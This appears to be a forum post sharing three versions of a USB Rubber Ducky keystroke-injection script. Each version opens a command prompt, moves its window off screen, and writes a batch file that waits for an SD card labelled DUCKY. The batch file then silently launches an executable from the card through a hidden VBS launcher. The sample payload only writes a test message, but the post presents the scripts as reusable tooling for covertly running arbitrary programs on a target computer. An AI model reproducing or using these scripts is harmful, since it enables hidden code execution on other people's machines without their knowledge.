The following is a payload I have been working on that waits until a drive labeled "DUCKY" is mounted. I have used some of midnightsnake's code in this payload. The name of the file that is run can be changed to .exe, I am just having it run a batch for testing purposes. The line that says "STRING START %myd%\myEXE.bat" is the line that executes the executable. ``` REM Author: overwraith REM Name: RunEXE.txt REM Purpose: Run an executable file off of the SD card after it mounts. REM Encoder V2.4 REM Using the run command for a broader OS base. DEFAULT_DELAY 25 DELAY 3000 GUI r DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d ENTER STRING if Exist %myd% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %myd%\HelloWorld.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER STRING EXIT ENTER ``` The following is the batch file that is run after the "DUCKY" drive has been mounted. Everything is being run invisibly, so you will need to check for the existence of "Message.txt" which will probably be in "C:\Windows\system32". ``` REM Message.txt echo Hello Wolrd!!! echo Hello World!!! > Message.txt ``` The encoders now support the repeat command, so should only be a problem if you are using an old encoder. Encoders also now support white space in the duck script, so functions have been separated with white space. The following is a newer version of the RunEXE from SD payload which uses googleknowsbest's method for finding the "DUCKY" drive, which is more portable than the previous version's method. This version should work on all current Windows versions. Ex... XP, Vista, and Windows 7. ``` REM Author: overwraith REM Name: RunEXE_V2.txt REM Purpose: Run an executable file off of the SD card after it mounts. Uses googleknowsbest's slightly more portable method to find the "Ducky" drive. REM Encoder V2.4 REM Using the run command for a broader OS base. DEFAULT_DELAY 75 DELAY 3000 GUI r DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:) ENTER STRING if Exist %DUCKYdrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %DUCKYdrive%\HelloWorld.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER REM STRING EXIT REM ENTER ``` The following is another take on the RunEXE from SD payload, I think the micro SD connection is faster than it used to be, it could just be me. Here I am using a special for loop which uses the 'Vol' command for volume information. I am pretty sure it runs on most Windows boxes, and am reasonably sure it runs on most old computers. The main reason for the revamp is to eliminate some of the problems associated with the 'diskpart' command, which if run on a non admin box will cause previous scripts to essentially hang. ``` REM Author: overwraith REM Name: RunEXE_V3.txt REM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different verison of the drive finder code. REM Encoder V2.4+ REM Using the run command for a broader OS base. DEFAULT_DELAY 75 DELAY 3000 GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( ENTER STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do ( ENTER STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" ) ENTER STRING ) ENTER STRING ) ENTER STRING if Exist %DuckyDrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %DuckyDrive%\HelloWorld.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER STRING EXIT ENTER ```